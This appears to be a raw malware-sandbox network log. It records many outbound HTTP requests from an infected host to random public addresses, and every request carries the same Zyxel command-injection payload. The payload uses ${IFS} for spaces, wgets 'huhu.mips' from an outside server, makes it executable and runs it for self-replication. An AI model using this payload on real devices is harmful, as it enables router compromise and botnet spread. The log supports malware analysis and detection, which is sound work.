                                              Jan 29, 2024 07:04:10.408931971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9359192.168.2.1453878162.83.59.161443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.408976078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9360192.168.2.1460270221.210.102.124443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.409010887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9361192.168.2.1437800147.125.120.154443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.409039021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9362192.168.2.1441176108.80.227.10443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.409069061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9363192.168.2.1450762141.202.99.195443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.409107924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9364192.168.2.145557237.167.109.0443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.409142017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9365192.168.2.1454348119.212.225.221443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.409202099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9366192.168.2.143815089.41.116.198443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.409228086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9367192.168.2.144373499.14.99.15443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.409266949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9368192.168.2.144799423.1.11.238443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.409300089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9369192.168.2.1438054128.163.228.120443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.409342051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9370192.168.2.1447792221.103.22.212443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.409375906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9371192.168.2.143752488.82.30.95443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.409413099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9372192.168.2.1456436203.96.213.226443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.409440041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9373192.168.2.1457876123.252.74.244443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.409481049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9374192.168.2.1441690167.132.109.232443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.409516096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9375192.168.2.1455092195.19.30.206443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.409568071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9376192.168.2.1454106124.173.202.160443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.409605980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9377192.168.2.14342385.148.154.179443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.409641981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9378192.168.2.1450870198.76.136.83443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.409684896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9379192.168.2.144027232.202.201.149443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.409729958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9380192.168.2.1434100170.160.185.144443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.409786940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9381192.168.2.1436304105.235.19.136443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.409807920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9382192.168.2.1435672101.183.57.116443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.409842968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9383192.168.2.144307447.232.106.211443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.409914017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9384192.168.2.143920454.201.91.58443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.410048962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9385192.168.2.1448534117.101.125.15443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.410085917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9386192.168.2.1458118184.145.151.53443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.410118103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9387192.168.2.143942299.28.8.242443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.410149097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9388192.168.2.143662252.78.167.26443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.410192013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9389192.168.2.1452464100.161.106.222443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.410212994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9390192.168.2.1447024133.136.204.238443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.410259962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9391192.168.2.1444718131.7.96.25443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.410305023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9392192.168.2.1457048106.242.0.248443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.410341024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9393192.168.2.14505209.19.104.222443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.410384893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9394192.168.2.1440710148.58.92.9443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.410432100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9395192.168.2.1446784193.92.70.192443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.410458088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9396192.168.2.1445390126.78.212.126443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.410518885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9397192.168.2.144697665.74.18.196443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.410551071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9398192.168.2.1444316106.235.137.208443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.410584927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9399192.168.2.1454314144.209.29.129443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.410608053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9400192.168.2.1437282169.107.101.88443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.410643101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9401192.168.2.1451116136.109.217.234443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.410665989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9402192.168.2.145341283.167.224.61443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.410716057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9403192.168.2.145013037.20.44.117443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.410764933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9404192.168.2.1457518101.1.69.240443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.410787106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9405192.168.2.1456632134.80.245.70443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.410846949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9406192.168.2.1436258189.49.168.183443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.410871983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9407192.168.2.1434200187.242.231.94443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.410923958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9408192.168.2.1447298158.121.190.105443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.410969973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9409192.168.2.1443298143.199.254.116443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.410979033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9410192.168.2.1459810152.240.58.245443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.411036968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9411192.168.2.145574078.105.115.197443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.411081076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9412192.168.2.1435134163.140.234.235443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.411133051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9413192.168.2.1440084207.136.128.17443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.411161900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9414192.168.2.1446024189.196.119.50443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.411202908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9415192.168.2.1442640203.255.73.107443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.411245108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9416192.168.2.1456940156.230.22.164443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.411277056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9417192.168.2.144632851.2.173.219443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.411317110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9418192.168.2.1438570129.213.85.138443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.411370039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9419192.168.2.145911641.191.58.142443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.411407948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9420192.168.2.145686449.19.105.64443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.411454916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9421192.168.2.144844051.190.11.12443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.411482096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9422192.168.2.1449498140.0.115.69443
                                              TimestampBytes transferredDirectionData
